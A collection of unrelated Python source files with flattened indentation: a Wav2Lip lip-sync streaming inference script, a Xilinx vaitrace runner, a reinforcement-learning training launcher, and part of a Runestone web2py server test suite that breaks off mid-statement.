if len(img_batch) > 0:
img_batch, mel_batch = np.asarray(img_batch), np.asarray(mel_batch)
img_masked = img_batch.copy()
img_masked[:, args.img_size // 2:] = 0
img_batch = np.concatenate((img_masked, img_batch), axis=3) / 255.
mel_batch = np.reshape(mel_batch, [len(mel_batch), mel_batch.shape[1], mel_batch.shape[2], 1])
yield img_batch, mel_batch, frame_batch, coords_batch
# mel_step_size: size of each mel_chunk (except last one which can be shorter)
# can't be made very small due to neural network architecture (should be > roughly 3)
mel_step_size = 16
device = 'cuda' if torch.cuda.is_available() else 'cpu'
print('Using {} for inference.'.format(device))
def _load(checkpoint_path):
if device == 'cuda':
checkpoint = torch.load(checkpoint_path)
else:
checkpoint = torch.load(checkpoint_path,
map_location=lambda storage, loc: storage)
return checkpoint
def load_model(path):
model = Wav2Lip()
print("Load checkpoint from: {}".format(path))
checkpoint = _load(path)
s = checkpoint["state_dict"]
new_s = {}
for k, v in s.items():
new_s[k.replace('module.', '')] = v
model.load_state_dict(new_s)
model = model.to(device)
return model.eval()
##### For streaming #####
def preprocess_video():
if not os.path.isfile(args.face):
raise ValueError('--face argument must be a valid path to video/image file')
elif args.face.split('.')[1] in ['jpg', 'png', 'jpeg']:
full_frames = [cv2.imread(args.face)]
fps = args.fps
else:
video_stream = cv2.VideoCapture(args.face)
fps = video_stream.get(cv2.CAP_PROP_FPS)
print('Reading video frames...')
full_frames = []
while 1:
still_reading, frame = video_stream.read()
if not still_reading:
video_stream.release()
break
if args.resize_factor > 1:
frame = cv2.resize(frame, (frame.shape[1] // args.resize_factor, frame.shape[0] // args.resize_factor))
if args.rotate:
frame = cv2.rotate(frame, cv2.cv2.ROTATE_90_CLOCKWISE)
y1, y2, x1, x2 = args.crop
if x2 == -1: x2 = frame.shape[1]
if y2 == -1: y2 = frame.shape[0]
frame = frame[y1:y2, x1:x2]
full_frames.append(frame)
print("Number of frames available for inference: " + str(len(full_frames)))
return full_frames
def preprocess_audio():
# Extract wav file
if not args.audio.endswith('.wav'):
print('Extracting raw audio...')
command = 'ffmpeg -y -i {} -strict -2 -ar {} {}'.format(args.audio, args.audio_sr, 'temp/temp.wav')
subprocess.call(command, shell=True)
args.audio = 'temp/temp.wav'
def txt2vid_inference(fifo_filename_video, process1, width, height):
# Get frames from input video
full_frames = preprocess_video()
# run face detection (precompute)
face_det_results = face_detect_wrapper(full_frames)
# Load audio again for generating video face
# ideally should be avoided(!!!!!!!!)
wav = audio.load_wav(args.audio, args.audio_sr)
print('Len of input wav file:', len(wav))
# Overall process works like this:
# - split wav file into small chunks
# - Initiate output stream for writing frames to intermediate video file
# - Go through the audio chunks one by one. For each chunk:
# - compute melspectrrogram: mels
# - convert mel into overlapping chunks (#chunks = #frames correspoonding to audio chunk, e.g., for 200 ms audio and fps 25, we get 5 frames)
# - Now go through the mel_chunks and the input video frames, and run NN to compute the output frame one by one, which are written to the output stream
# - Combine the output file with video with the original audio file to get final output
# mel_idx_multiplier: this is supposed to align the audio melspec to the video fps,
# by default set to 80.0/fps. This determines the mel chunking process, defining the
# by which we move a window of size mel_step_size (16). For very short audio chunks, the
# default vale doesn't work well due to rounding effects and edge effects leading to very
# short mel vector relative to audio length. We fix this by reducing the mel_idx_multiplier
# which reduces the offsets of the consecutive mel chunks, and makes sure we get enough
# frames for each audio chunk.
# NOTE: The value has been chosen for fps=25, and NUM_AUDIO_SAMPLES_PER_STEP 3200. For other values, please recalculate
mel_idx_multiplier = 15.0 / args.fps
# NUM_AUDIO_SAMPLES_PER_STEP: defines the chunks in which audio is processed.
# Should be such that number of video frames within step is an integer
# NOTE: Current system assumes 3200 (i.e., 200ms chunks)
# NOTE: Can't make this much smaller, since that reduces the mel size to so small
# that the mel_chunk produced is smaller than allowed by neural network architecture.
NUM_AUDIO_SAMPLES_PER_STEP = np.ceil(args.audio_sr*0.2).astype('int') # 200 ms for 16000 Hz
num_audio_samples = len(wav)
model = load_model(args.checkpoint_path)
print("Model loaded")
frame_h, frame_w = full_frames[0].shape[:-1]
# # initiate video writer
# out = cv2.VideoWriter('temp/result.avi',
# cv2.VideoWriter_fourcc(*'DIVX'), fps, (frame_w, frame_h))
# Setup video streaming pipe:
fifo_video_out = open(fifo_filename_video, "wb")
frames_done = 0
for audio_step in tqdm(range(int(np.ceil(num_audio_samples // NUM_AUDIO_SAMPLES_PER_STEP)))):
curr_wav = wav[audio_step * NUM_AUDIO_SAMPLES_PER_STEP:(audio_step + 1) * NUM_AUDIO_SAMPLES_PER_STEP]
# print(curr_wav.shape)
# print('start:',audio_step*NUM_AUDIO_SAMPLES_PER_STEP)
# print('end:',(audio_step+1)*NUM_AUDIO_SAMPLES_PER_STEP)
mel = audio.melspectrogram(curr_wav)
# print(curr_wav)
# print(mel.shape)
if np.isnan(mel.reshape(-1)).sum() > 0:
raise ValueError(
'Mel contains nan! Using a TTS voice? Add a small epsilon noise to the wav file and try again')
# mel_chunk generation process. Generate overlapping chunks, with the shift in
# chunks determined by int(i * mel_idx_multiplier), and the chunk length is
# mel_step_size = 16 (except for last chunk). Two important constraints to satisfy:
# 1. len(mel_chunks) should be equal to number of frames to be generated according to
# fps and NUM_AUDIO_SAMPLES_PER_STEP
# 2. Each mel_chunk must be sufficiently long otherwise NN gives error.
mel_chunks = []
i = 0
while 1:
start_idx = int(i * mel_idx_multiplier)
if start_idx + mel_step_size > len(mel[0]):
mel_chunks.append(mel[:, len(mel[0]) - mel_step_size:])
break
mel_chunks.append(mel[:, start_idx: start_idx + mel_step_size])
i += 1
# print("Length of mel chunks: {}".format(len(mel_chunks)))
batch_size = args.wav2lip_batch_size
gen = datagen(full_frames, face_det_results, mel_chunks, frames_done)
for i, (img_batch, mel_batch, frames, coords) in enumerate(gen):
img_batch = torch.FloatTensor(np.transpose(img_batch, (0, 3, 1, 2))).to(device)
mel_batch = torch.FloatTensor(np.transpose(mel_batch, (0, 3, 1, 2))).to(device)
with torch.no_grad():
pred = model(mel_batch, img_batch)
pred = pred.cpu().numpy().transpose(0, 2, 3, 1) * 255.
for p, f, c in zip(pred, frames, coords):
y1, y2, x1, x2 = c
p = cv2.resize(p.astype(np.uint8), (x2 - x1, y2 - y1))
f[y1:y2, x1:x2] = p
# print(f.dtype)
# cv2.imshow("mywindow",f)
# cv2.waitKey(1)
# write generated frame to video writer (note: no audio right now)
# out.write(f)
out_frame_BGR = f.copy()
out_frame_RGB = out_frame_BGR[:,:,[2,1,0]]
frames_done += 1
# write to pipe
write_video_frame(fifo_video_out, out_frame_RGB)
fifo_video_out.close()
# out.release()
# # combine original audio and generated video
# command = 'ffmpeg -y -i {} -i {} -strict -2 -q:v 1 {}'.format(args.audio, 'temp/result.avi', args.outfile)
# subprocess.call(command, shell=platform.system() != 'Windows')
def stream():
# get audio in right formats
preprocess_audio()
logger.info('Preprocessed Audio')
width, height = get_video_info(args.face)
process1_video = start_ffmpeg_process1(args.face, args.fps)
logger.info('Video input pipe set')
process1_audio = start_ffmpeg_process1_audio(args.audio)
logger.info('Audio input pipe set')
# fifo pipes (remove file name if already exists)
fifo_filename_video = '/tmp/fifovideo'
fifo_filename_audio = '/tmp/fifoaudio'
if os.path.exists(fifo_filename_video):
os.remove(fifo_filename_video)
if os.path.exists(fifo_filename_audio):
os.remove(fifo_filename_audio)
os.mkfifo(fifo_filename_video)
os.mkfifo(fifo_filename_audio)
logger.info('fifo exists now')
process2 = start_ffmpeg_process2(fifo_filename_video, fifo_filename_audio, width, height, args.fps, args.port)
logger.info('Output pipe set')
audio_bytes_per_video_frame = np.ceil((args.audio_sr/args.fps)*2).astype('int') # 2 bytes, 640 audio frames (16000/25)
# we run audio and video in separate threads otherwise the fifo opening blocks
# create threads
video_thread = threading.Thread(target=txt2vid_inference,args=(fifo_filename_video, process1_video, width, height))
logger.info('Video thread launched')
audio_thread = threading.Thread(target=audio_thread_handler,args=(fifo_filename_audio, process1_audio, audio_bytes_per_video_frame))
logger.info('Audio thread launched')
# start threads
video_thread.start()
audio_thread.start()
# wait for threads to finish executing
video_thread.join()
audio_thread.join()
logger.info('Waiting for ffmpeg process1')
process1_video.wait()
logger.info('Waiting for ffmpeg process2')
process2.wait()
os.remove(fifo_filename_video)
os.remove(fifo_filename_audio)
logger.info('Done')
def main():
stream()
if __name__ == '__main__':
main()
|
vaitracePyRunner.py
|
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
# Copyright 2019 Xilinx Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import time
import signal
from multiprocessing import Process
from threading import Thread
import collector
import tracer
import logging
pyProc = None
def pyRunCtx(pyCmd):
sys.argv[:] = pyCmd
progname = pyCmd[0]
sys.path.insert(0, os.path.dirname(progname))
logging.info("vaitrace compile python code: %s" % progname)
with open(progname, 'rb') as fp:
code = compile(fp.read(), progname, 'exec')
globs = {
'__file__': progname,
'__name__': '__main__',
'__package__': None,
'__cached__': None,
}
logging.info("vaitrace exec poython code: %s" % progname)
exec(code, globs, None)
def handler(signum, frame):
global pyProc
if pyProc.is_alive():
pyProc.kill()
logging.info("Killing process...")
logging.info("Processing trace data, please wait...")
else:
logging.info("Processing trace data, please wait...")
def run(globalOptions: dict):
global pyProc
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
options = globalOptions
if options.get('cmdline_args').get('bypass', False):
cmd = options.get('control').get('cmd')
logging.info("Bypass vaitrace, just run cmd")
pyCmd = options.get('control').get('cmd')
pyRunCtx(pyCmd)
exit(0)
"""Preparing"""
tracer.prepare(options)
tracer.start()
"""requirememt format: ["tracerName", "tracerName1", "hwInfo", ...]"""
collector.prepare(options, tracer.getSourceRequirement())
collector.start()
"""Start Running"""
pyCmd = options.get('control').get('cmd')
timeout = options.get('control').get('timeout')
# pyRunCtx(pyCmd)
pyProc = Thread(target=pyRunCtx, args=(pyCmd,))
pyProc.start()
options['control']['launcher'] = "python"
options['control']['pid'] = os.getpid()
options['control']['time'] = time.strftime(
"%Y-%m-%d %H:%M:%S", time.localtime())
if timeout <= 0:
pyProc.join()
else:
while timeout > 0:
time.sleep(1)
timeout -= 1
p = pyProc.is_alive()
if p == False:
break
logging.info("vaitrace timeout, waiting for Python thread terminated")
pyProc.join()
collector.stop()
tracer.stop()
tracer.process(collector.getData())
|
run.py
|
# coding: utf-8
"""
Usage:
python [options]
Options:
-h,--help 显示帮助
-i,--inference 推断 [default: False]
-a,--algorithm=<name> 算法 [default: ppo]
-c,--config-file=<file> 指定模型的超参数config文件 [default: None]
-e,--env=<file> 指定环境名称 [default: None]
-p,--port=<n> 端口 [default: 5005]
-u,--unity 是否使用unity客户端 [default: False]
-g,--graphic 是否显示图形界面 [default: False]
-n,--name=<name> 训练的名字 [default: None]
-s,--save-frequency=<n> 保存频率 [default: None]
-m,--models=<n> 同时训练多少个模型 [default: 1]
--store-dir=<file> 指定要保存模型、日志、数据的文件夹路径 [default: None]
--seed=<n> 指定模型的随机种子 [default: 0]
--max-step=<n> 每回合最大步长 [default: None]
--max-episode=<n> 总的训练回合数 [default: None]
--sampler=<file> 指定随机采样器的文件路径 [default: None]
--load=<name> 指定载入model的训练名称 [default: None]
--fill-in 指定是否预填充经验池至batch_size [default: False]
--prefill-choose 指定no_op操作时随机选择动作,或者置0 [default: False]
--gym 是否使用gym训练环境 [default: False]
--gym-agents=<n> 指定并行训练的数量 [default: 1]
--gym-env=<name> 指定gym环境的名字 [default: CartPole-v0]
--gym-env-seed=<n> 指定gym环境的随机种子 [default: 0]
--render-episode=<n> 指定gym环境从何时开始渲染 [default: None]
--info=<str> 抒写该训练的描述,用双引号包裹 [default: None]
Example:
python run.py -a sac -g -e C:/test.exe -p 6666 -s 10 -n test -c config.yaml --max-step 1000 --max-episode 1000 --sampler C:/test_sampler.yaml
python run.py -a ppo -u -n train_in_unity --load last_train_name
python run.py -ui -a td3 -n inference_in_unity
python run.py -gi -a dddqn -n inference_with_build -e my_executable_file.exe
python run.py --gym -a ppo -n train_using_gym --gym-env MountainCar-v0 --render-episode 1000 --gym-agents 4
python run.py -u -a ddpg -n pre_fill --fill-in --prefill-choose
"""
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
import sys
import time
NAME = time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime(time.time()))
import platform
BASE_DIR = f'C:/RLData' if platform.system() == "Windows" else os.environ['HOME'] + f'/RLData'
from typing import Dict
from copy import deepcopy
from docopt import docopt
from multiprocessing import Process
from common.agent import Agent
from common.yaml_ops import load_yaml
from common.config import Config
def get_options(options: Dict):
f = lambda k, t: None if options[k] == 'None' else t(options[k])
op = Config()
op.add_dict(dict([
['inference', bool(options['--inference'])],
['algo', str(options['--algorithm'])],
['algo_config', f('--config-file', str)],
['env', f('--env', str)],
['port', int(options['--port'])],
['unity', bool(options['--unity'])],
['graphic', bool(options['--graphic'])],
['name', f('--name', str)],
['save_frequency', f('--save-frequency', int)],
['models', int(options['--models'])],
['store_dir', f('--store-dir', str)],
['seed', int(options['--seed'])],
['max_step', f('--max-step', int)],
['max_episode', f('--max-episode', int)],
['sampler', f('--sampler', str)],
['load', f('--load', str)],
['fill_in', bool(options['--fill-in'])],
['prefill_choose', bool(options['--prefill-choose'])],
['gym', bool(options['--gym'])],
['gym_agents', int(options['--gym-agents'])],
['gym_env', str(options['--gym-env'])],
['gym_env_seed', int(options['--gym-env-seed'])],
['render_episode', f('--render-episode', int)],
['info', f('--info', str)]
]))
return op
def agent_run(*args):
Agent(*args)()
def run():
if sys.platform.startswith('win'):
import win32api
import win32con
import _thread
def _win_handler(event, hook_sigint=_thread.interrupt_main):
if event == 0:
hook_sigint()
return 1
return 0
# Add the _win_handler function to the windows console's handler function list
win32api.SetConsoleCtrlHandler(_win_handler, 1)
options = docopt(__doc__)
options = get_options(dict(options))
print(options)
default_config = load_yaml(f'config.yaml')
# gym > unity > unity_env
model_args = Config(**default_config['model'])
train_args = Config(**default_config['train'])
env_args = Config()
buffer_args = Config(**default_config['buffer'])
model_args.algo = options.algo
model_args.algo_config = options.algo_config
model_args.seed = options.seed
model_args.load = options.load
if options.gym:
train_args.add_dict(default_config['gym']['train'])
train_args.update({'render_episode': options.render_episode})
env_args.add_dict(default_config['gym']['env'])
env_args.type = 'gym'
env_args.env_name = options.gym_env
env_args.env_num = options.gym_agents
env_args.env_seed = options.gym_env_seed
else:
train_args.add_dict(default_config['unity']['train'])
env_args.add_dict(default_config['unity']['env'])
env_args.type = 'unity'
env_args.port = options.port
env_args.sampler_path = options.sampler
if options.unity:
env_args.file_path = None
env_args.env_name = 'unity'
else:
env_args.update({'file_path': options.env})
if os.path.exists(env_args.file_path):
env_args.env_name = os.path.join(
*os.path.split(env_args.file_path)[0].replace('\\', '/').replace(r'//', r'/').split('/')[-2:]
)
else:
raise Exception('can not find this file.')
if options.inference:
env_args.train_mode = False
env_args.render = True
else:
env_args.train_mode = True
env_args.render = options.graphic
train_args.index = 0
train_args.name = NAME
train_args.inference = options.inference
train_args.fill_in = options.fill_in
train_args.prefill_choose= options.prefill_choose
train_args.base_dir = os.path.join(options.store_dir or BASE_DIR, env_args.env_name, model_args.algo)
train_args.update(
dict([
['name', options.name],
['max_step', options.max_step],
['max_episode', options.max_episode],
['save_frequency', options.save_frequency],
['info', options.info]
])
)
if options.inference:
Agent(env_args, model_args, buffer_args, train_args).evaluate()
trails = options.models
if trails == 1:
agent_run(env_args, model_args, buffer_args, train_args)
elif trails > 1:
processes = []
for i in range(trails):
_env_args = deepcopy(env_args)
_model_args = deepcopy(model_args)
_model_args.seed += i * 10
_buffer_args = deepcopy(buffer_args)
_train_args = deepcopy(train_args)
_train_args.index = i
if _env_args.type == 'unity':
_env_args.port = env_args.port + i
p = Process(target=agent_run, args=(_env_args, _model_args, _buffer_args, _train_args))
p.start()
time.sleep(10)
processes.append(p)
[p.join() for p in processes]
else:
raise Exception('trials must be greater than 0.')
if __name__ == "__main__":
try:
run()
except Exception as e:
print(e)
sys.exit()
|
test_server.py
|
# *****************************************
# |docname| - Tests using the web2py server
# *****************************************
# These tests start the web2py server then submit requests to it. All the fixtures are auto-imported by pytest from ``conftest.py``.
#
# .. contents::
#
# Imports
# =======
# These are listed in the order prescribed by `PEP 8
# <http://www.python.org/dev/peps/pep-0008/#imports>`_.
#
# Standard library
# ----------------
from textwrap import dedent
import json
from threading import Thread
import datetime
import re
import sys
import time
# Third-party imports
# -------------------
import pytest
import six
# Local imports
# -------------
from .utils import web2py_controller_import
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
# Debugging notes
# ===============
# Invoke the debugger.
##import pdb; pdb.set_trace()
# Put this in web2py code, then use the web-based debugger.
##from gluon.debug import dbg; dbg.set_trace()
# Tests
# =====
# Use for easy manual testing of the server, by setting up a user and class automatically. Comment out the line below to enable it.
@pytest.mark.skip(reason="Only needed for manual testing.")
def test_manual(runestone_db_tools, test_user):
# Modify this as desired to create courses, users, etc. for manual testing.
course_1 = runestone_db_tools.create_course()
test_user("bob", "bob", course_1)
# Pause in the debugger until manual testing is done.
import pdb
pdb.set_trace()
def test_killer(test_assignment, test_client, test_user_1, runestone_db_tools):
"""
This test ensures that we have the routing set up for testing properly.
This test will fail if routes.py is set up as follows.
routes_onerror = [
('runestone/static/404', '/runestone/static/fail.html'),
('runestone/500', '/runestone/default/reportabug.html'),
]
for testing purposes we don't want web2py to capture 500 errors.
"""
with pytest.raises(Exception) as excinfo:
test_client.post("admin/killer")
assert test_client.text == ""
print(excinfo.value)
assert "ticket" in str(excinfo.value) or "INTERNAL" in str(excinfo.value)
# Validate the HTML produced by various web2py pages.
# NOTE -- this is the start of a really really long decorator for test_1
@pytest.mark.parametrize(
"url, requires_login, expected_string, expected_errors",
[
# **Admin**
# ----------
# FIXME: Flashed messages don't seem to work.
# ('admin/index', False, 'You must be registered for a course to access this page', 1),
# ('admin/index', True, 'You must be an instructor to access this page', 1),
("admin/doc", True, "Runestone Help and Documentation", 1),
# **Assignments**
# ----------------
("assignments/chooseAssignment", True, "Assignments", 1),
("assignments/doAssignment", True, "Bad Assignment ID", 1),
# TODO: Why 2 errors here? Was just 1.
(
"assignments/practice",
True,
"Practice tool is not set up for this course yet.",
2,
),
("assignments/practiceNotStartedYet", True, "test_course_1", 2),
# **Default**
# ------------
# *User*
#
# The `authentication <http://web2py.com/books/default/chapter/29/09/access-control#Authentication>`_ section gives the URLs exposed by web2py. Check these.
("default/user/login", False, "Login", 1),
("default/user/register", False, "Registration", 1),
("default/user/logout", True, "Logged out", 1),
# One validation error is a result of removing the input field for the e-mail, but web2py still tries to label it, which is an error.
("default/user/profile", True, "Profile", 2),
("default/user/change_password", True, "Change password", 1),
# Runestone doesn't support this.
#'default/user/verify_email', False, 'Verify email', 1),
("default/user/retrieve_username", False, "Retrieve username", 1),
("default/user/request_reset_password", False, "Request reset password", 1),
# This doesn't display a webpage, but instead redirects to courses.
# ('default/user/reset_password, False, 'Reset password', 1),
("default/user/impersonate", True, "Impersonate", 1),
# FIXME: This produces an exception.
#'default/user/groups', True, 'Groups', 1),
("default/user/not_authorized", False, "Not authorized", 1),
# *Other pages*
#
# TODO: What is this for?
# ('default/call', False, 'Not found', 0),
("default/index", True, "Course Selection", 1),
("default/about", False, "About Us", 1),
("default/error", False, "Error: the document does not exist", 1),
("default/ack", False, "Acknowledgements", 1),
# web2py generates invalid labels for the radio buttons in this form.
("default/bio", True, "Tell Us About Yourself", 3),
("default/courses", True, "Course Selection", 1),
("default/remove", True, "Remove a Course", 1),
# Should work in both cases.
("default/reportabug", False, "Report a Bug", 1),
("default/reportabug", True, "Report a Bug", 1),
# ('default/sendreport', True, 'Could not create issue', 1),
("default/terms", False, "Terms and Conditions", 1),
("default/privacy", False, "Runestone Academy Privacy Policy", 1),
("default/donate", False, "Support Runestone Interactive", 1),
# TODO: This doesn't really test much of the body of either of these.
("default/coursechooser", True, "Course Selection", 1),
# If we choose an invalid course, then we go to the profile to allow the user to add that course. The second validation failure seems to be about the ``for`` attribute of the ```<label class="readonly" for="auth_user_email" id="auth_user_email__label">`` tag, since the id ``auth_user_email`` isn't defined elsewhere.
("default/coursechooser/xxx", True, "Course IDs for open courses", 2),
("default/removecourse", True, "Course Selection", 1),
("default/removecourse/xxx", True, "Course Selection", 1),
(
"dashboard/studentreport",
True,
"Recent Activity",
1,
),
# **Designer**
# -------------
(
"designer/index",
True,
"This page allows you to select a book for your own class.",
1,
),
("designer/build", True, "Build a Custom", 1),
# **OAuth**
# ----------
(
"oauth/index",
False,
"This page is a utility for accepting redirects from external services like Spotify or LinkedIn that use oauth.",
1,
),
("books/index", False, "Runestone Test Book", 1),
("books/published", False, "Runestone Test Book", 1),
# TODO: Many other views!
],
)
def test_validate_user_pages(
url, requires_login, expected_string, expected_errors, test_client, test_user_1
):
if requires_login:
test_user_1.login()
else:
test_client.logout()
test_client.validate(url, expected_string, expected_errors)
# Validate the HTML in instructor-only pages.
# NOTE -- this is the start of a really really long decorator for test_2
@pytest.mark.parametrize(
"url, expected_string, expected_errors",
[
# **Default**
# ------------
# web2py-generated stuff produces two extra errors.
("default/bios", "Bios", 3),
# FIXME: The element ``<form id="editIndexRST" action="">`` in ``views/admin/admin.html`` produces the error ``Bad value \u201c\u201d for attribute \u201caction\u201d on element \u201cform\u201d: Must be non-empty.``.
#
# **Admin**
# ----------
("admin/admin", "Course Settings", 1),
("admin/course_students", '"test_user_1"', 2),
("admin/createAssignment", "ERROR", None),
("admin/grading", "assignment", 1),
# TODO: This produces an exception.
# ('admin/practice', 'Choose when students should start their practice.', 1),
# TODO: This deletes the course, making the test framework raise an exception. Need a separate case to catch this.
# ('admin/deletecourse', 'Manage Section', 2),
# FIXME: these raise an exception.
# ('admin/addinstructor', 'Trying to add non-user', 1), -- this is an api call
# ('admin/add_practice_items', 'xxx', 1), -- this is an api call
("admin/assignments", "Assignment", 6), # labels for hidden elements
# ('admin/backup', 'xxx', 1),
("admin/practice", "Choose when students should start", 1),
# ('admin/removeassign', 'Cannot remove assignment with id of', 1),
# ('admin/removeinstructor', 'xxx', 1),
# ('admin/removeStudents', 'xxx', 1),
("admin/get_assignment", "Error: assignment ID", 1),
("admin/get_assignment?assignmentid=junk", "Error: assignment ID", 1),
("admin/get_assignment?assignmentid=100", "Error: assignment ID", 1),
# TODO: added to the ``createAssignment`` endpoint so far.
# **Dashboard**
# --------------
("dashboard/index", "Instructor Dashboard", 1),
("dashboard/grades", "Gradebook", 1),
# TODO: This doesn't really test anything about either
# exercisemetrics or questiongrades other than properly handling a call with no information
("dashboard/exercisemetrics", "Instructor Dashboard", 1),
("dashboard/questiongrades", "Instructor Dashboard", 1),
],
)
def test_validate_instructor_pages(
url, expected_string, expected_errors, test_client, test_user, test_user_1
):
test_instructor_1 = test_user("test_instructor_1", "password_1", test_user_1.course)
test_instructor_1.make_instructor()
# Make sure that non-instructors are redirected.
test_client.logout()
test_client.validate(url, "Login")
test_user_1.login()
test_client.validate(url, "Insufficient privileges")
test_client.logout()
# Test the instructor results.
test_instructor_1.login()
test_client.validate(url, expected_string, expected_errors)
# Test the ``ajax/preview_question`` endpoint.
def test_preview_question(test_client, test_user_1):
preview_question = "ajax/preview_question"
# Passing no parameters should raise an error.
test_client.validate(preview_question, "Error: ")
# Passing something not JSON-encoded should raise an error.
test_client.validate(preview_question, "Error: ", data={"code": "xxx"})
# Passing invalid RST should produce a Sphinx warning.
test_client.validate(preview_question, "WARNING", data={"code": '"*hi"'})
# Passing valid RST with no Runestone component should produce an error.
test_client.validate(preview_question, "Error: ", data={"code": '"*hi*"'})
# Passing a string with Unicode should work. Note that 0x0263 == 611; the JSON-encoded result will use this.
test_client.validate(
preview_question,
r"\u03c0",
data={
"code": json.dumps(
dedent(
"""\
.. fillintheblank:: question_1
Mary had a π.
- :x: Whatever.
"""
)
)
},
)
# Verify that ``question_1`` is not in the database. TODO: This passes even if the ``DBURL`` env variable in ``ajax.py`` fucntion ``preview_question`` isn't deleted. So, this test doesn't work.
db = test_user_1.runestone_db_tools.db
assert len(db(db.fitb_answers.div_id == "question_1").select()) == 0
# TODO: Add a test case for when the runestone build produces a non-zero return code.
# Test the ``default/user/profile`` endpoint.
def test_user_profile(test_client, test_user_1):
test_user_1.login()
runestone_db_tools = test_user_1.runestone_db_tools
course_name = "test_course_2"
test_course_2 = runestone_db_tools.create_course(course_name)
# Test a non-existant course.
test_user_1.update_profile(
expected_string="Errors in form", course_name="does_not_exist"
)
# Test an invalid e-mail address. TODO: This doesn't produce an error message.
##test_user_1.update_profile(expected_string='Errors in form',
## email='not a valid e-mail address')
# Change the user's profile data; add a new course.
username = "a_different_username"
first_name = "a different first"
last_name = "a different last"
email = "a_different_email@foo.com"
test_user_1.update_profile(
username=username,
first_name=first_name,
last_name=last_name,
email=email,
course_name=course_name,
accept_tcp="",
is_free=True,
)
# Check the values.
db = runestone_db_tools.db
user = db(db.auth_user.id == test_user_1.user_id).select().first()
# The username shouldn't be changable.
assert user.username == test_user_1.username
assert user.first_name == first_name
assert user.last_name == last_name
# TODO: The e-mail address isn't updated.
# assert user.email == email
assert user.course_id == test_course_2.course_id
assert user.accept_tcp == False # noqa: E712
# TODO: I'm not sure where the section is stored.
# assert user.section == section
# Test that the course name is correctly preserved across registrations if other fields are invalid.
def test_registration(test_client, runestone_db_tools):
# Registration doesn't work unless we're logged out.
test_client.logout()
course_name = "a_course_name"
runestone_db_tools.create_course(course_name)
# Now, post the registration.
username = "username"
first_name = "first"
last_name = "last"
email = "e@mail.com"
password = "password"
test_client.validate(
"default/user/register",
"Please fix the following errors in your registration",
data=dict(
username=username,
first_name=first_name,
last_name=last_name,
# The e-mail address must be unique.
email=email,
password=password,
password_two=password + "oops",
# Note that ``course_id`` is (on the form) actually a course name.
course_id=course_name,
accept_tcp="on",
donate="0",
_next="/runestone/default/index",
_formname="register",
),
)
# Check that the pricing system works correctly.
def test_pricing(runestone_db_tools, runestone_env):
# Check the pricing.
default_controller = web2py_controller_import(runestone_env, "default")
db = runestone_db_tools.db
base_course = runestone_db_tools.create_course()
child_course = runestone_db_tools.create_course(
"test_child_course", base_course=base_course.course_name
)
# First, test on a base course.
for expected_price, actual_price in [(0, None), (0, -100), (0, 0), (15, 15)]:
db(db.courses.id == base_course.course_id).update(student_price=actual_price)
assert default_controller._course_price(base_course.course_id) == expected_price
# Test in a child course as well. Create a matrix of all base course prices by all child course prices.
for expected_price, actual_base_price, actual_child_price in [
(0, None, None),
(0, None, 0),
(0, None, -1),
(2, None, 2),
(0, 0, None),
(0, 0, 0),
(0, 0, -1),
(2, 0, 2),
(0, -2, None),
(0, -2, 0),
(0, -2, -1),
(2, -2, 2),
(3, 3, None),
(0, 3, 0),
(0, 3, -1),
(2, 3, 2),
]:
db(db.courses.id == base_course.course_id).update(
student_price=actual_base_price
)
db(db.courses.id == child_course.course_id).update(
student_price=actual_child_price
)
assert (
default_controller._course_price(child_course.course_id) == expected_price
)
# Check that setting the price causes redirects to the correct location (payment vs. donation) when registering for a course or adding a new course.
def test_price_free(runestone_db_tools, test_user):
db = runestone_db_tools.db
course_1 = runestone_db_tools.create_course(student_price=0)
course_2 = runestone_db_tools.create_course("test_course_2", student_price=0)
# Check registering for a free course.
test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=True)
# Verify the user was added to the ``user_courses`` table.
assert (
db(
(db.user_courses.course_id == test_user_1.course.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
# Check adding a free course.
test_user_1.update_profile(course_name=course_2.course_name, is_free=True)
# Same as above.
assert (
db(
(db.user_courses.course_id == course_2.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
def test_price_paid(runestone_db_tools, test_user):
db = runestone_db_tools.db
# Check registering for a paid course.
course_1 = runestone_db_tools.create_course(student_price=1)
course_2 = runestone_db_tools.create_course("test_course_2", student_price=1)
# Check registering for a paid course.
test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=False)
# Until payment is provided, the user shouldn't be added to the ``user_courses`` table. Ensure that refresh, login/logout, profile changes, adding another class, etc. don't allow access.
test_user_1.test_client.logout()
test_user_1.login()
test_user_1.test_client.validate("default/index")
# Check adding a paid course.
test_user_1.update_profile(course_name=course_2.course_name, is_free=False)
# Verify no access without payment.
assert (
not db(
(db.user_courses.course_id == course_1.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
assert (
not db(
(db.user_courses.course_id == course_2.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
# Check that payments are handled correctly.
def test_payments(runestone_controller, runestone_db_tools, test_user):
if not runestone_controller.settings.STRIPE_SECRET_KEY:
pytest.skip("No Stripe keys provided.")
db = runestone_db_tools.db
course_1 = runestone_db_tools.create_course(student_price=100)
test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=False)
def did_payment():
return (
db(
(db.user_courses.course_id == course_1.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
# Test some failing tokens.
assert not did_payment()
for token in ["tok_chargeCustomerFail", "tok_chargeDeclined"]:
test_user_1.make_payment(token)
assert not did_payment()
test_user_1.make_payment("tok_visa")
assert did_payment()
# Check that the payment record is correct.
payment = (
db(
(db.user_courses.user_id == test_user_1.user_id)
& (db.user_courses.course_id == course_1.course_id)
& (db.user_courses.id == db.payments.user_courses_id)
)
